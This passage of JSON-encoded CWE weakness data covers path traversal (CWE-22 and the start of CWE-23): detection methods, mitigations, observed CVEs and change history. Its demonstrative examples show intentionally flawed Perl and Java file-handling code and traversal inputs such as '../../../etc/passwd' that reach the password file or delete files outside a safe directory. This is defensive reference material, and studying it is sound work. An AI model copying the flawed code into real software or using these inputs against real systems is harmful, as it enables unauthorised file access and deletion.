effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy."]}},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"&lt;$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"&lt;ul&gt;\\\\n\\";while (&lt;$fh&gt;) {}print \\"&lt;/ul&gt;\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"&lt;li&gt;$_&lt;/li&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."},{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]},{"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);f.delete()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"/safe_dir/../important.dat"}],"Body_Text":["An attacker could provide an input such as this:","The software assumes that the path is valid because it starts with the \\"/safe_path/\\" sequence, but the \\"../\\" sequence will cause the program to delete the important.dat file in the parent directory"]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0467","Description":"Newsletter module allows reading arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0467"},{"Reference":"CVE-2009-4194","Description":"FTP server allows deletion of arbitrary files using \\"..\\" in the DELE command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4194"},{"Reference":"CVE-2009-4053","Description":"FTP server allows creation of arbitrary directories using \\"..\\" in the MKD command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4053"},{"Reference":"CVE-2009-0244","Description":"FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0244"},{"Reference":"CVE-2009-4013","Description":"Software package maintenance program allows overwriting arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4013"},{"Reference":"CVE-2009-4449","Description":"Bulletin board allows attackers to determine the existence of files using the avatar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4449"},{"Reference":"CVE-2009-4581","Description":"PHP program allows arbitrary code execution using \\"..\\" in filenames that are fed to the include() function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4581"},{"Reference":"CVE-2010-0012","Description":"Overwrite of files using a .. in a Torrent file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0012"},{"Reference":"CVE-2010-0013","Description":"Chat program allows overwriting files using a custom smiley request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013"},{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2009-1936","Description":"Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS00-PL","Entry_Name":"Canonicalize path names before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":33,"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-22"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"126"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Directory Traversal and Using Parent Paths (..)&#34; Page 370"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-186"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-22"}}]},"Notes":{"Note":[{"#text":"Pathname equivalence can be regarded as a type of canonicalization error.","attr":{"@_Type":"Relationship"}},{"#text":"Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing \\"/\\" on a filename could bypass access rules that don\'t expect a trailing /, causing a server to provide the file when it normally would not).","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use \\"directory traversal\\" only to refer to the injection of \\"..\\" and equivalent sequences whose specific meaning is to traverse directories.","Other variants like \\"absolute pathname\\" and \\"drive letter\\" have the *effect* of directory traversal, but some people may not call it such, since it doesn\'t involve \\"..\\" or equivalent."]},{"#text":"Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.","attr":{"@_Type":"Research Gap"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that \\"..\\\\\\" is vulnerable, but not test \\"../\\" which may also be vulnerable.","Any combination of directory separators (\\"/\\", \\"\\\\\\", etc.) and numbers of \\".\\" (e.g. \\"....\\") can produce unique variants; for example, the \\"//../\\" variant is not listed (CVE-2004-0325). See this entry\'s children and lower-level descendants."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Traversal","attr":{"@_Date":"2010-02-16"}}}},"23":{"attr":{"@_ID":"23","@_Name":"Relative Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \\"..\\" that can resolve to a location that is outside of that directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" 